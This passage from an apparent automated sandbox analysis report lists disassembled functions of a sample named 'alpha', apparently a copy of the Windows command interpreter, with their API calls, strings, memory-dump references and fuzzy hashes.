                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction ID: c8919e68bff2b47a5e4b0fcea17178696a64c3ac30c23caf54151209c4d6b29d
                              • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction Fuzzy Hash: 88416A65E0C652C6FB64BF12A598379F6A0AF90751FCC9031CE88422E8DF7CA495A730
                              Function 00007FF744F2BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                              • String ID: %04X-%04X$:
                              • API String ID: 930873262-1938371929
                              • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction ID: 626f5a751669813aafbc07313dbe450b460fb27dca45836db7d80f6f7bd4554a
                              • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction Fuzzy Hash: 90414C21A1CA42D2EB20BF62E4812BAE3A0FB85751FC94135DE9E426DDDF3DD544A720
                              Function 00007FF744F16A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A73
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A91
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AB0
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AE3
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16B01
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit
                              • String ID: +-~!$<>+-*/%()|^&=,
                              • API String ID: 2770779731-632268628
                              • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction ID: effe43d12c9b242c3720abc3283af76f7e8fdc4af1f499ed7bcf7c80ff681041
                              • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction Fuzzy Hash: 6B31EC2260DA56C6E750BF12E490279B6F0FB45F85B898135DE5E43398EF3CE815A720
                              Function 00007FF744F2D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                              • String ID:
                              • API String ID: 3192234081-0
                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                              • Instruction ID: 34f147b3339e768225ab7a28d054b617f5bffdcdf10c4df780bf20ed006358df
                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                              • Instruction Fuzzy Hash: DF31833160C651CBE710BF22A48467DFB91FB89B94F889134DE8A477D9CE3DD4019B10
                              Function 00007FF744F11630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11673
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1168D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11757
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1176E
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11788
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1179C
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Size
                              • String ID:
                              • API String ID: 3586862581-0
                              • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction ID: 6b9ee04aab8ce0b254235bed3acaca53cdf8a9d7e3e82c3b704dad8e1ff7173e
                              • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction Fuzzy Hash: 23916F21A0DA46C1EB54BF16A580679B6B0FB48B95F9D8135DE4E033E9DF3CE845E320
                              Function 00007FF744F186F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                              • String ID:
                              • API String ID: 1313749407-0
                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction ID: 7c5ccf3fa404b3ebb3a8cd3166f6ff99ea2509081dc24c35c25ba54863da6884
                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction Fuzzy Hash: DF51A321A0DA82C2EB54BF139594179E6A1FF49BA0FCC5130DD1E077D9DF3CE841A220
                              Function 00007FF744F2EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                              • String ID:
                              • API String ID: 920682188-0
                              • Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                              • Instruction ID: c4d12b912ffbc413a3486752296c172ffcc5051a0943b1e3faf40feab158bd85
                              • Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                              • Instruction Fuzzy Hash: 6B512832609B81CAEB25EF22D8942E8B7A0FB88B44F888035CE4D47798DF3CD6559710
                              Function 00007FF744F0F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                              Download Yara Rule
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction ID: ea862ab825ff82cdb19ccaddc6d8d5768ed13324faf621cabc5491e4c4ba097c
                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction Fuzzy Hash: 4A413665E0C616D6FB64BF13A5D8279B6A0AFA0755FCC9035CE8D021ECCF7CA485A630
                              Function 00007FF744F291B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpfprintfwcsrchr
                              • String ID: CMD Internal Error %s$%s$Null environment
                              • API String ID: 3625580822-2781220306
                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction ID: 8db3748b5cf487d76d1862f64ddc651fee1ab6b566f55aa7c79ef14803870df8
                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction Fuzzy Hash: AC31AD21B0C646C2FB14BF43A5906BAB2A0FB45B94F885134CE1D17BE9EE3DE445D320
                              Function 00007FF744F11FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcsspn
                              • String ID:
                              • API String ID: 3809306610-0
                              • Opcode ID: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                              • Instruction ID: 69386871fbf303d88bd9f8cec97215f18257d704fb2c90bf860edd4cb7b543c9
                              • Opcode Fuzzy Hash: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                              • Instruction Fuzzy Hash: B1B16E61A0CA86C2EB50BF96E490669E7B0FB54B80FC98031DE4E577D9DE7CE841D720
                              Function 00007FF744F28C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit$wcstol
                              • String ID:
                              • API String ID: 3841054028-0
                              • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                              • Instruction ID: 0b17c0922977a56cb7b53bb534fd406b76a2ff913f46b56bb16694c268474e90
                              • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                              • Instruction Fuzzy Hash: B551A426A0CA52C2E764BF17D4901B9B6A1FF68B51BCC8331DE5D422D8DF3DE456E220
                              Function 00007FF744F05984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23687
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236A6
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236EB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23703
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F23722
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Write_get_osfhandle$Mode
                              • String ID:
                              • API String ID: 1066134489-0
                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction ID: 03952be89b5e5851796d700cb64652f9ae7a22874f8080bf0615f3c3faab3b7b
                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction Fuzzy Hash: A15191A1B0C642C7EB24BF23948457AEAA5FB45B90F8C4435DE4A077D8DF3DE440AB21
                              Function 00007FF744F136EC Relevance: 9.1, APIs: 6, Instructions: 93fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                              • String ID:
                              • API String ID: 3249344982-0
                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction ID: 578939e4242fb67fa47df001270a7bbdf748ec297657d080c39c07082e531b99
                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction Fuzzy Hash: FD411D7261CA42C7F310AF12A884769BAA4FB59B95F884235DE8907BD8CF3CD5549B10
                              Function 00007FF744F089C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveErrorInformationLastTypeVolume
                              • String ID:
                              • API String ID: 850181435-0
                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction ID: a25159a1a3ac335a3f46242e936a41f15642525bb5f6a23aebf290d83171d45b
                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction Fuzzy Hash: E1415E3261CBC1CAE760AF22D8842E9B7A4FB89B44FC94525DE4D4BB98CF38D545D710
                              Function 00007FF744F134A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F13514
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13522
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F13541
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1355E
                                • Part of subcall function 00007FF744F136EC: _get_osfhandle.MSVCRT ref: 00007FF744F13715
                                • Part of subcall function 00007FF744F136EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F13770
                                • Part of subcall function 00007FF744F136EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13791
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                              • String ID:
                              • API String ID: 4057327938-0
                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                              • Instruction ID: 8ff8c57ca9dc096927748f16e9390c916036249e62a65df1ad22399b41290981
                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                              • Instruction Fuzzy Hash: 9A313C21A0CA42C7F754BF67A481079EAB4EF89B51FCC4135DE4E827D9DE3CE805A620
                              Function 00007FF744F2BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                              • String ID: KEYS$LIST$OFF
                              • API String ID: 411561164-4129271751
                              • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction ID: 234286788b9ec5b3d94f46992f5df923af23bde49a8f9ae562fe3542a5575cac
                              • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction Fuzzy Hash: 89214D20A1CA02C2FB54BF27A4C5175A6A1FB84750FC99631CE1E462EDDE7DE544A620
                              Function 00007FF744F101B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F101C4
